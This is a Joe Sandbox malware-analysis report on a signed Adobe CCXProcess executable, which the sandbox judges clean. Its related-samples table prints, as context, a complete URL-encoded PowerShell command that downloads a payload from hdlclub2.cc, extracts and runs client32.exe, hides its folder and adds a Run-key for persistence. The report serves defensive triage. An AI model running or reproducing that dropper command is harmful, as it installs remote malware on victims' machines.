Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
e3f6uu0uqV.exe

Overview

General Information

Sample name:e3f6uu0uqV.exe
(renamed file extension from bin to exe, renamed because original name is a hash value)
Original sample name:5f726d95a9ba1aebe43e8188edddb26556c730e03fb6227745e8afbf07d80c54.bin
Analysis ID:1545043
MD5:b42c964e0e6aa56983e77542692320cd
SHA1:b75ceacd2e7f73b2c5c8b95373e08665a28a1ae3
SHA256:5f726d95a9ba1aebe43e8188edddb26556c730e03fb6227745e8afbf07d80c54

Detection

Score:1
Range:0 - 100
Whitelisted:false
Confidence:80%

Signatures

Program does not show much activity (idle)
Uses 32bit PE files

Classification

Process Tree

  • System is w10x64
  • e3f6uu0uqV.exe (PID: 2828 cmdline: "C:\Users\user\Desktop\e3f6uu0uqV.exe" MD5: B42C964E0E6AA56983E77542692320CD)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

No yara matches

Sigma Signatures

No Sigma rule has matched

Suricata Signatures

No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

There are no malicious signatures, click here to show all signatures.

Source: e3f6uu0uqV.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: e3f6uu0uqV.exeStatic PE information: certificate valid
Source: e3f6uu0uqV.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: C:\Users\cclibs\Desktop\ccx-process-redirect-script\Release\CCXProcess.pdb source: e3f6uu0uqV.exe
Source: Binary string: C:\Users\cclibs\Desktop\ccx-process-redirect-script\Release\CCXProcess.pdb%%$GCTL source: e3f6uu0uqV.exe
Source: e3f6uu0uqV.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: e3f6uu0uqV.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
Source: e3f6uu0uqV.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: e3f6uu0uqV.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: e3f6uu0uqV.exeString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: e3f6uu0uqV.exeString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
Source: e3f6uu0uqV.exeString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: e3f6uu0uqV.exeString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: e3f6uu0uqV.exeString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
Source: e3f6uu0uqV.exeString found in binary or memory: http://ocsp.digicert.com0
Source: e3f6uu0uqV.exeString found in binary or memory: http://ocsp.digicert.com0A
Source: e3f6uu0uqV.exeString found in binary or memory: http://ocsp.digicert.com0C
Source: e3f6uu0uqV.exeString found in binary or memory: http://ocsp.digicert.com0X
Source: e3f6uu0uqV.exeString found in binary or memory: http://www.digicert.com/CPS0
Source: e3f6uu0uqV.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: classification engineClassification label: clean1.winEXE@1/0@0/0
Source: e3f6uu0uqV.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\e3f6uu0uqV.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: C:\Users\user\Desktop\e3f6uu0uqV.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\Desktop\e3f6uu0uqV.exeSection loaded: msvcp140.dllJump to behavior
Source: C:\Users\user\Desktop\e3f6uu0uqV.exeSection loaded: vcruntime140.dllJump to behavior
Source: C:\Users\user\Desktop\e3f6uu0uqV.exeSection loaded: vcruntime140.dllJump to behavior
Source: C:\Users\user\Desktop\e3f6uu0uqV.exeSection loaded: kernel.appcore.dllJump to behavior
Source: e3f6uu0uqV.exeStatic PE information: certificate valid
Source: e3f6uu0uqV.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: e3f6uu0uqV.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: e3f6uu0uqV.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: e3f6uu0uqV.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: e3f6uu0uqV.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: e3f6uu0uqV.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: e3f6uu0uqV.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: e3f6uu0uqV.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: C:\Users\cclibs\Desktop\ccx-process-redirect-script\Release\CCXProcess.pdb source: e3f6uu0uqV.exe
Source: Binary string: C:\Users\cclibs\Desktop\ccx-process-redirect-script\Release\CCXProcess.pdb%%$GCTL source: e3f6uu0uqV.exe
Source: e3f6uu0uqV.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: e3f6uu0uqV.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: e3f6uu0uqV.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: e3f6uu0uqV.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: e3f6uu0uqV.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
DLL Side-Loading		1
DLL Side-Loading		1
DLL Side-Loading		OS Credential Dumping1
System Information Discovery		Remote ServicesData from Local SystemData ObfuscationExfiltration Over Other Network MediumAbuse Accessibility Features

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
e3f6uu0uqV.exe3%VirustotalBrowse
e3f6uu0uqV.exe3%ReversingLabs

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

SourceDetectionScannerLabelLink
s-part-0017.t-0009.t-msedge.net0%VirustotalBrowse

URLs

No Antivirus matches

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
s-part-0017.t-0009.t-msedge.net
13.107.246.45
truefalseunknown

World Map of Contacted IPs

No contacted IP infos

General Information

Joe Sandbox version:41.0.0 Charoite
Analysis ID:1545043
Start date and time:2024-10-30 02:28:30 +01:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 1m 34s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:default.jbs
Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:2
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:0
Technologies:
  • EGA enabled
  • AMSI enabled
Analysis Mode:default
Analysis stop reason:Timeout
Sample name:e3f6uu0uqV.exe
(renamed file extension from bin to exe, renamed because original name is a hash value)
Original Sample Name:5f726d95a9ba1aebe43e8188edddb26556c730e03fb6227745e8afbf07d80c54.bin
Detection:CLEAN
Classification:clean1.winEXE@1/0@0/0
Cookbook Comments:
  • Stop behavior analysis, all processes terminated

Warnings

  • Exclude process from analysis (whitelisted): dllhost.exe
  • Excluded domains from analysis (whitelisted): otelrules.azureedge.net, otelrules.afd.azureedge.net, azureedge-t-prod.trafficmanager.net

Simulations

Behavior and APIs

No simulations

Joe Sandbox View / Context

IPs

No context

Domains

MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
s-part-0017.t-0009.t-msedge.nethttps://docs.google.com/uc?export=download&id=1gucHUhrnC0jRDGAhRfRkCK8rYqf0o3cvGet hashmaliciousUnknownBrowse
  • 13.107.246.45
https://email.email.pandadoc.net/c/eJxMkE9vEzEQxT_N-pbKO_ba3oMPhWipiEBAoYdeqrE92zVJbGfthD-fHkWi0OOM9Hv6vResU8LNhoXsz0dK7SkG-2Z5fwRKPgf39rRsv4op3T4ujGyvBQcQIxi2WBVmDUaIIJAgaJrROA0G-iB6wRWyaIGD7DmMvZYDqJtej653A7hxHASXppOcjhgPNwVTwJD9TaLGYn1qK3pCdyDb1jOxg11aK7UTtx1MHUxYyn_E52MH04t-B9MFOjG1vKfUia3X2M_Kjc7LORAnLZT03Ds1eE-GBjOKAXojOzGxlFuco8cWc7rOMAQynlBsvBtgI0GJDY6Ob0hzI7AHR0GxvD5jir__QXSR97_ybpvLA1U6_hxPwWtiq625LJE6yfex4rnlgmurV3u20iXWv7hvCj6bWb97PBX_PTp1rg_yE2v2peCm4fpM7fWnUnp9s4sF9iOv-1rQ0zXU7Bzsvn3A0PT9nfmCQ_ioy92fAAAA__-PeqWAGet hashmaliciousUnknownBrowse
  • 13.107.246.45
file.exeGet hashmaliciousStealc, VidarBrowse
  • 13.107.246.45
https://mailhotcmhakamloops.wordpress.com/Get hashmaliciousUnknownBrowse
  • 13.107.246.45
http://C:/Windows/System32/WindowsPowerShell/v1.0/powershell.exe%22%20-Ex%20Bypass%20-NoP%20-C%20$HRBRG='https://hdlclub2.cc/work/das.php?7387';$VHFTQMWZL=(New-Object%20System.Net.WebClient).DownloadString($HRBRG);$ZLFHWXDCL=%5BSystem.Convert%5D::FromBase64String($VHFTQMWZL);$asd%20=%20Get-Random%20-Minimum%20-5%20-Maximum%2012;%20$ATADDMBRA=%5BSystem.Environment%5D::GetFolderPath('ApplicationData')+'%5CYWYSGSQHQ'+$asd;if%20(!(Test-Path%20$ATADDMBRA%20-PathType%20Container))%20%7B%20New-Item%20-Path%20$ATADDMBRA%20-ItemType%20Directory%20%7D;$p=Join-Path%20$ATADDMBRA%20'CXCC.zip';%5BSystem.IO.File%5D::WriteAllBytes($p,$ZLFHWXDCL);try%20%7B%20%20%20%20Add-Type%20-A%20System.IO.Compression.FileSystem;%5BSystem.IO.Compression.ZipFile%5D::ExtractToDirectory($p,$ATADDMBRA)%7D%20catch%20%7B%20%20%20%20Write-Host%20'Failed:%20'%20+%20$_;%20%20%20%20exit%7D;$CV=Join-Path%20$ATADDMBRA%20'client32.exe';if%20(Test-Path%20$CV%20-PathType%20Leaf)%20%7B%20Start-Process%20-FilePath%20$CV%7D%20else%20%7BWrite-Host%20'No%20exe.'%7D;$fd=Get-Item%20$ATADDMBRA%20-Force;%20$fd.attributes='Hidden';$s=$ATADDMBRA+'%5Cclient32.exe';$k='HKCU:%5CSOFTWARE%5CMicrosoft%5CWindows%5CCurrentVersion%5CRun';$v='NXXUI';$ASDASD='String';New-ItemProperty%20-Path%20$k%20-Name%20$v%20-Value%20$s%20-PropertyType%20$ASDASD;Get hashmaliciousUnknownBrowse
  • 13.107.246.45
https://frs1sctxxr.shop/1stSourceGet hashmaliciousUnknownBrowse
  • 13.107.246.45
PO-10212024168877 PNG2023-W101.exeGet hashmaliciousGuLoaderBrowse
  • 13.107.246.45
file.exeGet hashmaliciousCredential FlusherBrowse
  • 13.107.246.45
file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, StealcBrowse
  • 13.107.246.45
file.exeGet hashmaliciousCredential FlusherBrowse
  • 13.107.246.45

ASNs

No context

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

No created / dropped files found

Static File Info

General

File type:PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):6.520791779393824
TrID:
  • Win32 Executable (generic) a (10002005/4) 99.96%
  • Generic Win/DOS Executable (2004/3) 0.02%
  • DOS Executable Generic (2002/1) 0.02%
  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:e3f6uu0uqV.exe
File size:133'128 bytes
MD5:b42c964e0e6aa56983e77542692320cd
SHA1:b75ceacd2e7f73b2c5c8b95373e08665a28a1ae3
SHA256:5f726d95a9ba1aebe43e8188edddb26556c730e03fb6227745e8afbf07d80c54
SHA512:6a29fe2add03e2a7c860cce440ca891e6eacf4e5d2a2476e03f618132adb30be46dff1965479fd2c3e564f3941e03dcc6a265834ac8f218dcb6ee26dd55a0b72
SSDEEP:1536:DOW/8cs/c59bqgU/KMkDE7JnRl1qgU/KMkDE7JnRle5c7dxol:DP59eguKMkDEmguKMkDED4l
TLSH:54D37E4E875944ABE57059B6C0AFBE5002A02D3D3E83C7BAFE58B50379723C9A433579
File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......]../...|...|...|...|...|K..}...|K..}...|K..}...|K..}...|...}...|...|&..|...}...|..d|...|...|...|...}...|Rich...|...............

File Icon

Icon Hash:5de0dcd6cce4da05

Static PE Info

General

Entrypoint:0x401aba
Entrypoint Section:.text
Digitally signed:true
Imagebase:0x400000
Subsystem:windows gui
Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Time Stamp:0x66046068 [Wed Mar 27 18:07:36 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:6
OS Version Minor:0
File Version Major:6
File Version Minor:0
Subsystem Version Major:6
Subsystem Version Minor:0
Import Hash:0a36c95a94bebbe1d38de00fb4fc2981

Authenticode Signature

Signature Valid:true
Signature Issuer:CN=DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA1, O="DigiCert, Inc.", C=US
Signature Validation Error:The operation completed successfully
Error Number:0
Not Before, Not After
  • 03/11/2023 01:00:00 05/11/2025 00:59:59
Subject Chain
  • CN=Adobe Inc., OU=Adobe Inc., O=Adobe Inc., L=San Jose, S=ca, C=US, SERIALNUMBER=2748129, OID.2.5.4.15=Private Organization, OID.1.3.6.1.4.1.311.60.2.1.2=Delaware, OID.1.3.6.1.4.1.311.60.2.1.3=US
Version:3
Thumbprint MD5:B6E022C07680B400E74E0ADED8A912C5
Thumbprint SHA-1:32BE8F82722EB0431F311911C7614ADBDA6420F8
Thumbprint SHA-256:FCB343892DFC94C83A3AFACDCE648F3EC769D6C972B5EBA186DC000DC2BD7E84
Serial:0669D36C7103089A363F83200B4519EB

Entrypoint Preview

Instruction
call 00007F4A2883CE24h
jmp 00007F4A2883C89Fh
push ebp
mov ebp, esp
push 00000000h
call dword ptr [00403010h]
push dword ptr [ebp+08h]
call dword ptr [0040303Ch]
push C0000409h
call dword ptr [00403014h]
push eax
call dword ptr [00403018h]
pop ebp
ret
push ebp
mov ebp, esp
sub esp, 00000324h
push 00000017h
call dword ptr [0040301Ch]
test eax, eax
je 00007F4A2883CA27h
push 00000002h
pop ecx
int 29h
mov dword ptr [00405198h], eax
mov dword ptr [00405194h], ecx
mov dword ptr [00405190h], edx
mov dword ptr [0040518Ch], ebx
mov dword ptr [00405188h], esi
mov dword ptr [00405184h], edi
mov word ptr [004051B0h], ss
mov word ptr [004051A4h], cs
mov word ptr [00405180h], ds
mov word ptr [0040517Ch], es
mov word ptr [00405178h], fs
mov word ptr [00405174h], gs
pushfd
pop dword ptr [004051A8h]
mov eax, dword ptr [ebp+00h]
mov dword ptr [0040519Ch], eax
mov eax, dword ptr [ebp+04h]
mov dword ptr [004051A0h], eax
lea eax, dword ptr [ebp+08h]
mov dword ptr [004051ACh], eax
mov eax, dword ptr [ebp-00000324h]
mov dword ptr [004050E8h], 00010001h

Rich Headers

Programming Language:
  • [IMP] VS2008 SP1 build 30729

Data Directories

NameVirtual AddressVirtual Size Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
IMAGE_DIRECTORY_ENTRY_IMPORT0x39400xc8.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE0x60000x1abec.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
IMAGE_DIRECTORY_ENTRY_SECURITY0x1de000x2a08.rsrc
IMAGE_DIRECTORY_ENTRY_BASERELOC0x210000x234.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG0x32ac0x70.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
IMAGE_DIRECTORY_ENTRY_TLS0x00x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x33200x40.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
IMAGE_DIRECTORY_ENTRY_IAT0x30000x100.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

Sections

NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
.text0x10000x15970x16007b8ef0317688f74fb378c2ec41bac0d0False0.6321022727272727data6.294941860736252IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata0x30000x105a0x12001376917fee16eb41bd686934dc814a45False0.3871527777777778data4.259966105818948IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data0x50000x4080x200a2c78a8bdad8e0e3dcc4ae6c32669df6False0.193359375data1.775994791475279IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc0x60000x1abec0x1ac000fbba547771fc2f3dbe05201d00a6d98False0.521037164135514data6.346753584952728IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc0x210000x2340x400608ca251fb6796b2d9419b9b5def11c6False0.5263671875data4.227372324475749IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

NameRVASizeTypeLanguageCountryZLIB Complexity
RT_ICON0x64900x468Device independent bitmap graphic, 16 x 32 x 32, image size 1024, resolution 2834 x 2834 px/mEnglishUnited States0.599290780141844
RT_ICON0x68f80x988Device independent bitmap graphic, 24 x 48 x 32, image size 2304, resolution 2834 x 2834 px/mEnglishUnited States0.4377049180327869
RT_ICON0x72800x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4096, resolution 2834 x 2834 px/mEnglishUnited States0.350375234521576
RT_ICON0x83280x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9216, resolution 2834 x 2834 px/mEnglishUnited States0.25228215767634854
RT_ICON0xa8d00x4228Device independent bitmap graphic, 64 x 128 x 32, image size 16384, resolution 2834 x 2834 px/mEnglishUnited States0.19225318847425601
RT_ICON0xeaf80x4a27PNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9962071326976769
RT_ICON0x135200x468Device independent bitmap graphic, 16 x 32 x 32, image size 1024, resolution 2834 x 2834 px/mEnglishUnited States0.599290780141844
RT_ICON0x139880x988Device independent bitmap graphic, 24 x 48 x 32, image size 2304, resolution 2834 x 2834 px/mEnglishUnited States0.4377049180327869
RT_ICON0x143100x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4096, resolution 2834 x 2834 px/mEnglishUnited States0.350375234521576
RT_ICON0x153b80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9216, resolution 2834 x 2834 px/mEnglishUnited States0.25228215767634854
RT_ICON0x179600x4228Device independent bitmap graphic, 64 x 128 x 32, image size 16384, resolution 2834 x 2834 px/mEnglishUnited States0.19225318847425601
RT_ICON0x1bb880x4a27PNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9962071326976769
RT_MENU0x205b00x4adataEnglishUnited States0.8648648648648649
RT_DIALOG0x205fc0x15cdataEnglishUnited States0.5545977011494253
RT_STRING0x207580x68dataEnglishUnited States0.625
RT_ACCELERATOR0x207c00x10dataEnglishUnited States1.25
RT_GROUP_ICON0x207d00x5adataEnglishUnited States0.7666666666666667
RT_GROUP_ICON0x2082c0x5adataEnglishUnited States0.8111111111111111
RT_VERSION0x208880x1e4dataEnglishUnited States0.5268595041322314
RT_MANIFEST0x20a6c0x17dXML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.5931758530183727

Imports

DLLImport
KERNEL32.dllWow64DisableWow64FsRedirection, GetEnvironmentVariableW, GetLastError, CreateProcessW, SetUnhandledExceptionFilter, GetCurrentProcess, TerminateProcess, IsProcessorFeaturePresent, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, IsDebuggerPresent, GetStartupInfoW, UnhandledExceptionFilter, GetModuleHandleW
MSVCP140.dll?_Xlength_error@std@@YAXPBD@Z
VCRUNTIME140.dll__current_exception, _CxxThrowException, _except_handler4_common, __std_exception_copy, __std_exception_destroy, __current_exception_context, memcpy, memset, memmove
api-ms-win-crt-string-l1-1-0.dllwcscpy_s, wcscat_s
api-ms-win-crt-runtime-l1-1-0.dll_invalid_parameter_noinfo_noreturn, _register_onexit_function, _crt_atexit, _controlfp_s, terminate, exit, _register_thread_local_exe_atexit_callback, _c_exit, _cexit, _initialize_onexit_table, _initterm_e, _initterm, _get_wide_winmain_command_line, _initialize_wide_environment, _configure_wide_argv, _exit, _set_app_type, _seh_filter_exe
api-ms-win-crt-heap-l1-1-0.dll_callnewh, malloc, _set_new_mode, free
api-ms-win-crt-math-l1-1-0.dll__setusermatherr
api-ms-win-crt-stdio-l1-1-0.dll__p__commode, _set_fmode
api-ms-win-crt-locale-l1-1-0.dll_configthreadlocale

Possible Origin

Language of compilation systemCountry where language is spokenMap
EnglishUnited States

Network Behavior

DNS Answers

TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
Oct 30, 2024 02:29:27.977071047 CET1.1.1.1192.168.2.60x71caNo error (0)shed.dual-low.s-part-0017.t-0009.t-msedge.nets-part-0017.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
Oct 30, 2024 02:29:27.977071047 CET1.1.1.1192.168.2.60x71caNo error (0)s-part-0017.t-0009.t-msedge.net13.107.246.45A (IP address)IN (0x0001)false

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

System Behavior

General

Target ID:0
Start time:21:29:16
Start date:29/10/2024
Path:C:\Users\user\Desktop\e3f6uu0uqV.exe
Wow64 process (32bit):true
Commandline:"C:\Users\user\Desktop\e3f6uu0uqV.exe"
Imagebase:0x680000
File size:133'128 bytes
MD5 hash:B42C964E0E6AA56983E77542692320CD
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:low
Has exited:true

Disassembly

No disassembly